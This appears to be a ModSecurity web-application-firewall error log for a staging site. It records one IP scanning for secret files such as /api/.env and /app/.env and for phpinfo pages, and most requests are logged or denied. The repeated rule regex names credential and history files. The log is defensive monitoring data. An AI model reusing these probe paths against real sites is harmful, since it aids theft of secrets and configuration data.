[Tue May 26 15:30:59.892441 2026] [security2:error] [pid 715645:tid 715829] [client 195.178.110.199:41694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVvW3VGgMGh8k213RgS3gAAADY"]
[Tue May 26 15:30:59.901603 2026] [security2:error] [pid 715645:tid 715792] [client 195.178.110.199:41628] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/api-node/.env"] [unique_id "ahVvW3VGgMGh8k213RgS3wAAABE"]
[Tue May 26 15:30:59.912141 2026] [security2:error] [pid 715645:tid 715818] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS2AAAACs"]
[Tue May 26 15:30:59.927384 2026] [security2:error] [pid 715645:tid 715900] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS3QAAAH0"]
[Tue May 26 15:30:59.955846 2026] [security2:error] [pid 715645:tid 715787] [client 195.178.110.199:41706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/api/.env"] [unique_id "ahVvW3VGgMGh8k213RgS5AAAAAw"]
[Tue May 26 15:30:59.969189 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:41746] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS4wAAAHI"]
[Tue May 26 15:31:00.017321 2026] [security2:error] [pid 715645:tid 715869] [client 195.178.110.199:41788] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS5QAAAF4"]
[Tue May 26 15:31:00.035388 2026] [security2:error] [pid 715645:tid 715793] [client 195.178.110.199:41750] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS5wAAABI"]
[Tue May 26 15:31:00.040795 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:41680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS6QAAABU"]
[Tue May 26 15:31:00.057596 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:41674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS6wAAAGg"]
[Tue May 26 15:31:00.076043 2026] [security2:error] [pid 715645:tid 715808] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS7gAAACE"]
[Tue May 26 15:31:00.088048 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:41642] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS7wAAABM"]
[Tue May 26 15:31:00.108962 2026] [security2:error] [pid 715645:tid 715867] [client 195.178.110.199:41636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/api-backend/.env"] [unique_id "ahVvXHVGgMGh8k213RgS8AAAAFw"]
[Tue May 26 15:31:00.223790 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS8wAAAHQ"]
[Tue May 26 15:31:00.234906 2026] [security2:error] [pid 715645:tid 715816] [client 195.178.110.199:41706] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS9AAAACk"]
[Tue May 26 15:31:00.239192 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:41642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/api/info.php"] [unique_id "ahVvXHVGgMGh8k213RgS-AAAABk"]
[Tue May 26 15:31:00.249829 2026] [security2:error] [pid 715645:tid 715795] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS9wAAABQ"]
[Tue May 26 15:31:00.286613 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS_AAAAHA"]
[Tue May 26 15:31:00.292165 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:41738] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS-QAAAC4"]
[Tue May 26 15:31:00.304863 2026] [security2:error] [pid 715645:tid 715875] [client 195.178.110.199:41788] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS_gAAAGQ"]
[Tue May 26 15:31:00.317739 2026] [security2:error] [pid 715645:tid 715817] [client 195.178.110.199:41744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS_QAAACo"]
[Tue May 26 15:31:00.329044 2026] [security2:error] [pid 715645:tid 715811] [client 195.178.110.199:41680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgS_wAAACQ"]
[Tue May 26 15:31:00.365721 2026] [security2:error] [pid 715645:tid 715846] [client 195.178.110.199:41660] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTAwAAAEc"]
[Tue May 26 15:31:00.368119 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:41750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/api/phpinfo.php"] [unique_id "ahVvXHVGgMGh8k213RgTCQAAAGU"]
[Tue May 26 15:31:00.379992 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTAgAAACY"]
[Tue May 26 15:31:00.395696 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:41758] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTBAAAABw"]
[Tue May 26 15:31:00.404853 2026] [security2:error] [pid 715645:tid 715833] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTBQAAADo"]
[Tue May 26 15:31:00.492488 2026] [security2:error] [pid 715645:tid 715802] [client 195.178.110.199:41738] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTCgAAABs"]
[Tue May 26 15:31:00.547193 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:41758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/apis/.env"] [unique_id "ahVvXHVGgMGh8k213RgTHQAAAEM"]
[Tue May 26 15:31:00.548213 2026] [security2:error] [pid 715645:tid 715860] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTEAAAAFU"]
[Tue May 26 15:31:00.548883 2026] [security2:error] [pid 715645:tid 715881] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTFQAAAGo"]
[Tue May 26 15:31:00.571063 2026] [security2:error] [pid 715645:tid 715858] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTGQAAAFM"]
[Tue May 26 15:31:00.605068 2026] [security2:error] [pid 715645:tid 715832] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTHgAAADk"]
[Tue May 26 15:31:00.631571 2026] [security2:error] [pid 715645:tid 715784] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTIQAAAAk"]
[Tue May 26 15:31:00.673334 2026] [security2:error] [pid 715645:tid 715847] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTKQAAAEg"]
[Tue May 26 15:31:00.675225 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTKwAAADg"]
[Tue May 26 15:31:00.677390 2026] [security2:error] [pid 715645:tid 715835] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTJAAAADw"]
[Tue May 26 15:31:00.681046 2026] [security2:error] [pid 715645:tid 715893] [client 195.178.110.199:41674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTJwAAAHY"]
[Tue May 26 15:31:00.699985 2026] [security2:error] [pid 715645:tid 715900] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTMwAAAH0"]
[Tue May 26 15:31:00.713721 2026] [security2:error] [pid 715645:tid 715869] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTOAAAAF4"]
[Tue May 26 15:31:00.714923 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTMgAAAA8"]
[Tue May 26 15:31:00.725032 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:41788] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTNQAAAE8"]
[Tue May 26 15:31:00.826954 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:41680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/app/.env"] [unique_id "ahVvXHVGgMGh8k213RgTPwAAAGY"]
[Tue May 26 15:31:00.828949 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTPgAAAHQ"]
[Tue May 26 15:31:00.830120 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTPQAAABg"]
[Tue May 26 15:31:00.887446 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTRwAAADI"]
[Tue May 26 15:31:00.895523 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTRgAAACg"]
[Tue May 26 15:31:00.909024 2026] [security2:error] [pid 715645:tid 715902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTSwAAAH8"]
[Tue May 26 15:31:00.933067 2026] [security2:error] [pid 715645:tid 715848] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTTgAAAEk"]
[Tue May 26 15:31:00.982131 2026] [security2:error] [pid 715645:tid 715833] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTUQAAADo"]
[Tue May 26 15:31:00.995171 2026] [security2:error] [pid 715645:tid 715819] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTVAAAACw"]
[Tue May 26 15:31:01.022056 2026] [security2:error] [pid 715645:tid 715860] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTWgAAAFU"]
[Tue May 26 15:31:01.030293 2026] [security2:error] [pid 715645:tid 715809] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTYQAAACI"]
[Tue May 26 15:31:01.031867 2026] [security2:error] [pid 715645:tid 715807] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTXQAAACA"]
[Tue May 26 15:31:01.039295 2026] [security2:error] [pid 715645:tid 715832] [client 195.178.110.199:41794] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTZAAAADk"]
[Tue May 26 15:31:01.046131 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTXwAAAFA"]
[Tue May 26 15:31:01.047922 2026] [security2:error] [pid 715645:tid 715858] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXHVGgMGh8k213RgTYwAAAFM"]
[Tue May 26 15:31:01.085333 2026] [security2:error] [pid 715645:tid 715865] [client 195.178.110.199:41706] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTagAAAFo"]
[Tue May 26 15:31:01.096882 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTbgAAAFc"]
[Tue May 26 15:31:01.134042 2026] [security2:error] [pid 715645:tid 715900] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTcQAAAH0"]
[Tue May 26 15:31:01.136399 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTdAAAADA"]
[Tue May 26 15:31:01.141015 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:41746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/application/.env"] [unique_id "ahVvXXVGgMGh8k213RgTeQAAAE8"]
[Tue May 26 15:31:01.143830 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTdQAAAB8"]
[Tue May 26 15:31:01.166106 2026] [security2:error] [pid 715645:tid 715863] [client 195.178.110.199:41738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/apps/.env"] [unique_id "ahVvXXVGgMGh8k213RgTegAAAFg"]
[Tue May 26 15:31:01.174271 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTeAAAAGg"]
